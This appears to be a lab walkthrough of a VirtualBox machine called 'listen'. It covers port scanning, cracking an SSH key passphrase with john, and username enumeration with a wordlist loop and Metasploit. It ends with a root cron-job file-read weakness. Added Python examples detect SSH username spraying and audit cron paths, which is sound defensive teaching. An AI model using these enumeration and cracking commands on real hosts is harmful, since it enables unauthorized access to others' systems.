```
❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e3:f6:57       VMware, Inc.
192.168.60.229  08:00:27:31:84:e3       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:e1:d8:58       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.114 seconds (121.10 hosts/sec). 4 responded

❯ export ip=192.168.60.229
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  / ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Open ports, closed hearts.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.229:22
Open 192.168.60.229:8000
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-05 15:12 CST
Initiating ARP Ping Scan at 15:12
Scanning 192.168.60.229 [1 port]
Completed ARP Ping Scan at 15:12, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:12
Completed Parallel DNS resolution of 1 host. at 15:12, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 15:12
Scanning 192.168.60.229 [2 ports]
Discovered open port 8000/tcp on 192.168.60.229
Discovered open port 22/tcp on 192.168.60.229
Completed SYN Stealth Scan at 15:12, 0.07s elapsed (2 total ports)
Nmap scan report for 192.168.60.229
Host is up, received arp-response (0.00035s latency).
Scanned at 2025-03-05 15:12:15 CST for 0s

PORT     STATE SERVICE  REASON
22/tcp   open  ssh      syn-ack ttl 64
8000/tcp open  http-alt syn-ack ttl 64
MAC Address: 08:00:27:31:84:E3 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)
```
```
Detected Plugins:
[ HTTPServer ]
        HTTP server header string. This plugin also attempts to
        identify the operating system from the server header.

        String       : SimpleHTTP/0.6 Python/3.7.3 (from server string)

[ Python ]
        Python is a programming language that lets you work more
        quickly and integrate your systems more effectively. You can
        learn to use Python and see almost immediate gains in
        productivity and lower maintenance costs.

        Version      : 3.7.3
        Website     : http://www.python.org/

HTTP Headers:
        HTTP/1.0 200 OK
        Server: SimpleHTTP/0.6 Python/3.7.3
        Date: Wed, 05 Mar 2025 07:13:56 GMT
        Content-type: text/html
        Content-Length: 44
        Last-Modified: Sat, 03 Jun 2023 18:24:27 GMT
```
```
❯ vi id_rsa
❯ ssh2john id_rsa > hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
idontknow        (id_rsa)
1g 0:00:00:00 DONE (2025-03-05 15:34) 100.0g/s 131200p/s 131200c/s 131200C/s cuties..slayer
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```
Username enumeration

The problem is that we do not know the username.

So we try enumerating usernames by attempting to log in with each one.

However, ssh has no option for passing the private key's passphrase on the command line.

Use ssh-agent to preload the private key instead.
```
❯ eval $(ssh-agent -s)   # start ssh-agent
Agent pid 1831758
❯ ssh-add id_rsa         # add the private key; you will be prompted for its passphrase
Enter passphrase for id_rsa:
Identity added: id_rsa (id_rsa)
❯ for i in $(cat /usr/share/seclists/Usernames/Names/names.txt);do ssh $i@$ip ;done   ## then just keep pressing Enter
```
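From the defender's side, the loop above leaves a distinctive trace in sshd's log: one source address trying many different usernames once each within a short window, which is unlike a password brute force against a single account. The following detector is an added example, not part of the original write-up. It works over a constructed auth.log excerpt embedded in the script (the hostname, PIDs, ports and timestamps are made up; the syslog year is assumed to be 2025 because the syslog format omits it), groups "Invalid user" events by source, counts distinct usernames in a sliding window, and records any accepted login from the same source after the burst.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample auth.log excerpt (not from the page): a burst of
# "Invalid user" attempts from one source followed by a successful key login.
SAMPLE_AUTH_LOG = """\
Mar  5 15:40:01 listen sshd[2101]: Invalid user aaron from 192.168.60.100 port 51210
Mar  5 15:40:02 listen sshd[2103]: Invalid user abbey from 192.168.60.100 port 51212
Mar  5 15:40:02 listen sshd[2105]: Invalid user abby from 192.168.60.100 port 51214
Mar  5 15:40:03 listen sshd[2107]: Invalid user abdul from 192.168.60.100 port 51216
Mar  5 15:40:04 listen sshd[2109]: Invalid user abe from 192.168.60.100 port 51218
Mar  5 15:40:05 listen sshd[2111]: Accepted publickey for abel from 192.168.60.100 port 51220 ssh2: RSA SHA256:FINGERPRINT-PLACEHOLDER
Mar  5 15:41:10 listen sshd[2130]: Invalid user admin from 10.0.0.7 port 40000
"""

# Matches the two sshd message shapes we care about. The syslog timestamp
# carries no year, so the caller supplies one.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?:Invalid user (?P<bad>\S+) from (?P<src1>\d+\.\d+\.\d+\.\d+)"
    r"|Accepted (?P<method>\w+) for (?P<good>\S+) from (?P<src2>\d+\.\d+\.\d+\.\d+))"
)


def parse_events(text, year=2025):
    """Return (timestamp, source_ip, username, kind) tuples, where kind is
    'invalid' or 'accepted'. Lines matching neither shape are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        if m['bad']:
            events.append((ts, m['src1'], m['bad'], 'invalid'))
        else:
            events.append((ts, m['src2'], m['good'], 'accepted'))
    return events


def detect_username_spray(events, window_s=60, min_distinct=5):
    """Flag a source that tries at least min_distinct *different* usernames
    within window_s seconds. A password brute force hammers one name; a
    wordlist loop touches many names once each, so the distinct-name count
    is the signal. Any accepted login from the same source after the burst
    is recorded, because that is the case worth escalating first."""
    by_src = defaultdict(list)
    for ev in sorted(events):
        by_src[ev[1]].append(ev)

    findings = []
    for src, evs in by_src.items():
        invalid = [e for e in evs if e[3] == 'invalid']
        for i, start in enumerate(invalid):
            names = set()
            for later in invalid[i:]:
                if (later[0] - start[0]).total_seconds() > window_s:
                    break
                names.add(later[2])
            if len(names) >= min_distinct:
                accepted_after = [e[2] for e in evs
                                  if e[3] == 'accepted' and e[0] >= start[0]]
                findings.append({
                    'src': src,
                    'window_start': start[0].isoformat(),
                    'distinct_users': len(names),
                    'accepted_after': accepted_after,
                })
                break  # one finding per source is enough
    return findings


if __name__ == "__main__":
    for finding in detect_username_spray(parse_events(SAMPLE_AUTH_LOG)):
        print(finding)
```

On the sample data the detector reports one source (five distinct names in four seconds, followed by an accepted login for abel) and ignores the single stray attempt from the other address. The thresholds are assumptions to tune per environment; on a real host the same function can be pointed at the output of `journalctl -u ssh` or /var/log/auth.log.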
```
❯ rustscan -a $ip -- -A -sV
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  / ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'

Open 192.168.60.230:22
Open 192.168.60.230:8000
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -A -sV" on ip 192.168.60.230
Depending on the complexity of the script, results may take some time to appear.

PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 64 OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey:
|   2048 0c:3f:13:54:6e:6e:e6:56:d2:91:eb:ad:95:36:c6:8d (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDhemxEZcm98GFwIRozVUePnC+Cejni5lScAa7ha5neDlWQT2e6dbubOkddku/qgtgY4/kw/pGPh7oTqHg9WKHTMqTAzdN0DDaU/5twewwMf6s9ERuuYYieP7mzjsX2APhOr23CFWVr37Y+mQ/A4J0ODizpr/mggCCi6kqHqyRWgcPG98AVJ9IjPehVkptQdLpQlSOV8EzJClu6tBInWzxtGi5v0B94lMYRDXqZE9Z1wCSh9oU0HnwRwfFqB0dcOH+kDZVLYi06aiHKXkKgSFM3G6LJQY8ad4FCEc7TU+agLRPHFUPFqqPbf9hbDD7MUdR4pXEQtJ1p/D/9rdbBg1Sp
|   256 9b:e6:8e:14:39:7a:17:a3:80:88:cd:77:2e:c3:3b:1a (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBB+zmcUltQUYUVvvfWqtUjdFpCh0IkOnPjmcctTpnXS7MWK37n6h9DEq4WNsHmauyKEuRnml5mOLUbNIZHHUBgY=
|   256 85:5a:05:2a:4b:c0:b2:36:ea:8a:e2:8a:b2:ef:bc:df (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHNArrcR981CzORruPnEn/opg56t7SFktwnhZzGpXcfE
8000/tcp open  http    syn-ack ttl 64 SimpleHTTPServer 0.6 (Python 3.7.3)
| http-methods:
|_  Supported Methods: GET HEAD
|_http-server-header: SimpleHTTP/0.6 Python/3.7.3
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:A6:23:DC (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Uptime guess: 3.163 days (since Sun Mar  2 13:49:30 2025)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE
HOP RTT     ADDRESS
1   0.58 ms 192.168.60.230
```
```
❯ msfconsole
Metasploit tip: Use the edit command to open the currently active module in
your editor

msf6 > search openssh

Matching Modules
================

   #  Name                                         Disclosure Date  Rank    Check  Description
   -  ----                                         ---------------  ----    -----  -----------
   0  post/windows/manage/forward_pageant          .                normal  No     Forward SSH Agent Requests To Remote Pageant
   1  post/windows/manage/install_ssh              .                normal  No     Install OpenSSH for Windows
   2  post/multi/gather/ssh_creds                  .                normal  No     Multi Gather OpenSSH PKI Credentials Collection
   3  auxiliary/scanner/ssh/ssh_enumusers          .                normal  No     SSH Username Enumeration
   4    \_ action: Malformed Packet                .                .       .      Use a malformed packet
   5    \_ action: Timing Attack                   .                .       .      Use a timing attack
   6  exploit/windows/local/unquoted_service_path  2001-10-25       great   Yes    Windows Unquoted Service Path Privilege Escalation

Interact with a module by name or index. For example info 6, use 6 or use exploit/windows/local/unquoted_service_path

msf6 > use 3
[*] Using action Malformed Packet - view all 2 actions with the show actions command
msf6 auxiliary(scanner/ssh/ssh_enumusers) > show options

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   CHECK_FALSE   true             no        Check for false positives (random username)
   DB_ALL_USERS  false            no        Add all users in the current database to the list
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT         22               yes       The target port
   THREADS       1                yes       The number of concurrent threads (max one per host)
   THRESHOLD     10               yes       Amount of seconds needed before a user is considered found (timing attack only)
   USERNAME                       no        Single username to test (username spray)
   USER_FILE                      no        File containing usernames, one per line

Auxiliary action:

   Name              Description
   ----              -----------
   Malformed Packet  Use a malformed packet

View the full module info with the info, or info -d command.

[*] 192.168.60.230:22 - SSH - Using malformed packet technique
[*] 192.168.60.230:22 - SSH - Checking for false positives
[*] 192.168.60.230:22 - SSH - Starting scan
[+] 192.168.60.230:22 - SSH - User 'abel' found
^C[*] Caught interrupt from the console...
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_enumusers) >
```
Getting user

We obtain the user abel and grab the user flag.
```
abel@listen:~$ id
uid=1000(abel) gid=1000(abel) groups=1000(abel)
abel@listen:~$ ls -al
total 32
drwx------ 4 abel abel 4096 Jun  3  2023 .
drwxr-xr-x 3 root root 4096 Jun  3  2023 ..
lrwxrwxrwx 1 root root    9 Jun 20  2021 .bash_history -> /dev/null
-rw-r--r-- 1 abel abel  220 Jun 12  2021 .bash_logout
-rw-r--r-- 1 abel abel 3526 Jun 12  2021 .bashrc
drwxr-xr-x 3 abel abel 4096 Jun  3  2023 .local
-rw-r--r-- 1 abel abel   66 Jun 12  2021 .selected_editor
drwx------ 2 abel abel 4096 Jun  3  2023 .ssh
-r-------- 1 abel abel   33 Jun  3  2023 user.txt
abel@listen:~$ cat user.txt
33f3f86a697126c6fe0a39a337ade21a
```
Upload linpeas.sh and run a scan.
Root privilege escalation

Arbitrary file read

We find a cron job: root copies /var/www/html/index.html to /tmp every minute.

Moreover, the /var/www/html directory is owned by the current user abel.
```
* * * * * root cp /var/www/html/index.html /tmp
------------------------------------------------------
abel@listen:/var/www/html$ ls -la
total 12
drwxr-xr-x 2 abel abel 4096 Jun  3  2023 .
drwxr-xr-x 3 abel abel 4096 Jun  3  2023 ..
-rw-r--r-- 1 abel abel   44 Jun  3  2023 index.html
```
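The root cause here is a root-run scheduled job that reads from a path the unprivileged user controls: any component of /var/www/html/index.html that abel owns can be swapped for a symlink, so root's `cp` ends up reading whatever the link points at. The audit below is an added example, not code from the write-up. It parses a constructed /etc/crontab excerpt (the first entry mirrors the one found above; the other two are made up), then walks every absolute path in each root job and reports the first path component whose owner is not uid 0. The `CONSTRUCTED_OWNERS` map stands in for the filesystem so the script runs offline; `fs_owner` is the real `os.lstat`-based lookup to use on a live host.

```python
import os
import re

# Constructed /etc/crontab excerpt (not the target's file); the first job
# mirrors the shape of the entry found in the write-up.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
* * * * *   root  cp /var/www/html/index.html /tmp
17 * * * *  root  /usr/bin/touch /var/log/heartbeat
*/5 * * * * abel  /home/abel/backup.sh
"""

# Constructed owner map (path -> uid) standing in for a real filesystem.
# uid 0 is root; uid 1000 is the unprivileged user, as in the listing above.
CONSTRUCTED_OWNERS = {
    '/': 0, '/var': 0, '/tmp': 0, '/usr': 0, '/usr/bin': 0,
    '/usr/bin/touch': 0, '/var/log': 0,
    '/var/www': 1000, '/var/www/html': 1000, '/var/www/html/index.html': 1000,
}

# System crontab line: five schedule fields, the run-as user, then the command.
CRONTAB_RE = re.compile(r"^\s*(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+?)\s*$")
# Absolute paths inside a command string.
PATH_RE = re.compile(r"(?<!\S)/[\w./-]+")


def parse_system_crontab(text):
    """Return (user, command) pairs, skipping blank, comment and VAR=value lines."""
    jobs = []
    for line in text.splitlines():
        fields = line.split()
        if not fields or fields[0].startswith('#') or '=' in fields[0]:
            continue
        m = CRONTAB_RE.match(line)
        if m:
            jobs.append((m['user'], m['cmd']))
    return jobs


def path_prefixes(path):
    """'/a/b/c' -> ['/', '/a', '/a/b', '/a/b/c']: every component whose owner
    could replace it with a symlink."""
    prefixes, cur = ['/'], ''
    for part in [p for p in path.split('/') if p]:
        cur += '/' + part
        prefixes.append(cur)
    return prefixes


def fs_owner(path):
    """Owner uid of a real path, or None if it does not exist. lstat is used
    so a symlink reports its own owner, not the owner of its target."""
    try:
        return os.lstat(path).st_uid
    except FileNotFoundError:
        return None


def audit_root_cron(jobs, owner_of=fs_owner):
    """For every root job, report the first path component along any absolute
    path in the command that is owned by a non-root uid. Nonexistent
    components are skipped; checking stops at the first bad component."""
    findings = []
    for user, cmd in jobs:
        if user != 'root':
            continue
        for path in PATH_RE.findall(cmd):
            for component in path_prefixes(path):
                uid = owner_of(component)
                if uid is None:
                    continue
                if uid != 0:
                    findings.append({'cmd': cmd, 'path': path,
                                     'component': component, 'owner_uid': uid})
                    break
    return findings


if __name__ == "__main__":
    jobs = parse_system_crontab(SAMPLE_CRONTAB)
    for finding in audit_root_cron(jobs, CONSTRUCTED_OWNERS.get):
        print(finding)
```

On the sample the only finding is the first job, flagged at /var/www (uid 1000); the touch job passes because every existing component is root-owned, and abel's own job is skipped since it does not run as root. The fix on a real system is either to run the job as the directory's owner or to make the source path root-owned end to end. Ownership is the only check this example makes; a complete audit would also flag group- or world-writable directories along the path.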